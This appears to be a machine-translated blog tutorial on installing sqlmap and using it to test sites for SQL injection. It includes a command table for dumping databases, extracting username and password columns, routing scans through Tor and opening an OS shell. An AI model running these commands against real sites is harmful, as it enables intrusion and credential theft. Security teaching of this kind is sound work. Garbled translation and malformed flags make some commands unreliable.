Monday, March 1, 14:14
Home how To SQLMAP: How to test your site for SQL vulnerabilities

SQLMAP: How to test your site for SQL vulnerabilities

In his space ethical hacking, SQLMAP is the predominant tool for finding vulnerabilities based on SQL injection. It is an open source solution written in python language that automates the process of finding and exploiting SQL vulnerabilities with the ultimate goal of fully controlling the database and server in which he is.

sqlmap

It includes several functions such as database fingerprinting, data collection and command line execution. Operating Systems. The SQLMAP tool can be used for the following purposes:

  • Checking a web application for a SQL injection vulnerability
  • Exploiting SQL injection vulnerability
  • Extract data from the database and its users
  • Override the Web Application Firewall (WAF)
  • Full control of the base operating system

Some of the most important features of SQLMAP are shown below:

  • It can support MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird and Sybase technologies.
  • It also supports 6 different SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
  • Supports finding hashed passwords using dictionary attack technique.
  • Allows crawling of users, hashed passwords, roles, permissions, bases, tables and columns.

What is SQL injection?

SQL injection is a hacking technique where the attacker, by modifying it URL or some other character input field of the web application can insert SQL commands directly into the database. This results in overriding application security techniques and as a result the attacker can extract data from the entire database, modify it and even delete it.

It is one of the oldest and most dangerous attacks on web applications. OWASP (Open Web Application Security Project) ranks injection threats at number one on the list of Top 10 Web Application Security Threats (OWASP Top 10).

How to use it

SQLMAP is available for operating systems Windows, Linux and Poppy. You will find it pre-installed on Linux distro for penetration testing, Kali Linux.

Windows 

The first step you should take is to download (if you don't already have it) the python interpreter - remember that the tool is written in python. You can download the latest version from here (v 3.8.0).

After you have successfully completed the python installation, follow these steps:

  1. Download it zip file by website of SQLMAP.
  2. Unzip the folder and its contents to the desired location
  3. Open a cmd console and navigate to the location where you unzipped the folder from the previous step.
  4. Run the sqlmap.py command…. And see all your options.
  5. Are you ready

sqlmap SQL

Linux

In almost all Linux distros Python is installed by default. If you're not sure, open a terminal and type python –version. If python is installed the above command will show you the version.

SQL

Then run the following commands to complete the installation of the tool:

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-devpython sqlmap.py

The last command will display on our screen something like the following:

sqlmap

How to use it

Here are some basic commands you can use with SQLMAP and their description:

Mandate Description
sqlmap -u “http://site.com/login.php” Simple check for a specific URL
sqlmap -u “http://site.com/login.php” –tor –tor-type = SOCKS5 'Check using tor
sqlmap -u "http://site.com/login.php" -time-sec 20 Control by setting the time limit
sqlmap -u “http://site.com/login.php” –dbs Option to return all databases of a web application
sqlmap -u “http://site.com/login.php” -D site_db –tables Returning the contents of a specific database
sqlmap -u “http://site.com/login.php” -D site_db -T users –dump Return the contents of a particular table
sqlmap -u “http://site.com/login.php” -D site_db -T users –columns Return all columns in a table
sqlmap -u “http://site.com/login.php” -D site_db -T users -C username, password –dump Return specific column content
sqlmap -u “http://site.com/login.php” –method “POST” –data “username = admin & password = admin & submit = Submit” -D social_mccodes -T users –dump Return table when we have admin login information
sqlmap –dbms = mysql -u “http://site.com/login.php” –os-shell Return to OS Shell
sqlmap –dbms = mysql -u “http://site.com/login.php” –sql-shell SQL Shell Return

You can find a more detailed cheetseat for SQLMAP here.

We look forward to your comments ...

LEAVE ANSWER

Please enter your comment!
Please enter your name here

stormi
stormi
Here's the crazy ones, the misfits, the rebels, the troublemakers ...

LIVE NEWS

Mageia 8: The new Linux distribution brings a lot of new updates

The team behind the Mageia distribution, after a year and a half of development, released a stable version of Mageia 8. It will receive support ...

Uber is accused of asking "sophisticated questions" to drivers

Uber is accused of using "sophisticated questions" in an investigation it sent to drivers, after a court ruling ruled that the company ...

How often do you make security updates on your mobile?

After the recent revelation of Samsung, that it will give its phones security updates for four years, it makes sense for some to wonder ...

SEC investigation into Elon Musk for Dogecoin tweets

https://www.youtube.com/watch?v=fZp5eph6NAQ Σύμφωνα με πληροφορίες, ο Διευθύνων Σύμβουλος της Tesla Elon Musk, βρίσκεται για ακόμα μια φορά κάτω...

YouTube Shorts is in beta in the United States

TikTok has caused a huge change in the field of social media. He managed to spread the meaning of short videos, and he did ...

Chrome: The sites will open in desktop mode on large Android tablets

Google Chrome is experimenting with a new feature that will automatically open web pages in desktop mode on an Android tablet that have several ...

Stalkerware: Russia, Brazil and the US were most affected in 2020

New research from the cyber security company "Kaspersky" points out that Russia, Brazil and the USA were the countries that were most affected ...

Why is the trend of selfie pop-up cameras being lost?

In recent years, technology companies have made bezels (also known as hoops) as thin as possible. In this way,...

Gab: Data from far-right users of the platform leaked

It was about a month and a half ago when Twitter and other major social networking platforms banned Donald Trump and other users with ...

T-Mobile: The company's customers received SIM swapping attacks!

The telecommunications provider "T-Mobile" revealed that it suffered data breach, after realizing that some of its customers were victims of SIM swapping attacks ....